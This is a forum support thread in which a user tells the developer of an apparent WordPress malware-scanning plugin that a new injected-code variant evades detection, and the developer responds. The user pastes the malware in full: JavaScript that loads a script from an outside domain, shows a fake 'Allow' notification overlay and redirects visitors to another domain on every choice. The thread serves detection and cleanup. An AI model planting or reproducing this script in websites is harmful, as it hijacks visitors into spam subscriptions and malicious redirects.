hiya, great tool as always!!! many many thanks Eli.
found that a new variation of this injected code is not being picked up.
tried a mysql query and it’s not picking up a char immediately after ““Allow—. char looks like a sq with 009D
when pasted into a sql query however it renders as a red bullet
database charset is utf8mb4_unicode_ci
have wrapped the char in a code tag, see html view of this msg.
;
const overlay = {“delay”:3000,”overlayStyle”:{“background”:”rgba(0,0,0, 0.6)”},”title”:”Attention!”,”description”:”Click “Allow†to subscribe to notifications and continue working with this website.”,…(overlayTranslations[navigator.language.slice(0, 2).toLowerCase()]||Object.values(overlayTranslations)[0])};
const s = document.createElement(‘script’);
s.src=’//humsoolt.net/pfe/current/tag.min.js?z=2774009′;
s.onload = (sdk) => {
sdk.updateOptions({overlay, overlayTranslations})
sdk.onPermissionDefault(() => {window.location.replace(“//ellcurvth.com/afu.php?zoneid=2826294″)});
sdk.onPermissionAllowed(() => {window.location.replace(“//ellcurvth.com/afu.php?zoneid=2826294″)});
sdk.onPermissionDenied(() => {window.location.replace(“//ellcurvth.com/afu.php?zoneid=2826294″)});
sdk.onAlreadySubscribed(() => {window.location.replace(“//ellcurvth.com/afu.php?zoneid=2826294″)});
sdk.onNotificationUnsupported(() => {});
}
document.head.appendChild(s);
Did you find this code in your DB?
I checked it against my current definition and it should be found by my DB Scan.
If this code is found in a file then please send me this file so that I can recheck it.
it’s in posts files (not necessarily pages but other posts) /wp-admin/post.php?post=1615&action=edit
happy to give access to phpmyadmin and wp-admin
just a quick thank you… the latest version deletes the variation of malware… can’t recommend your plugin enough! many many thanks.
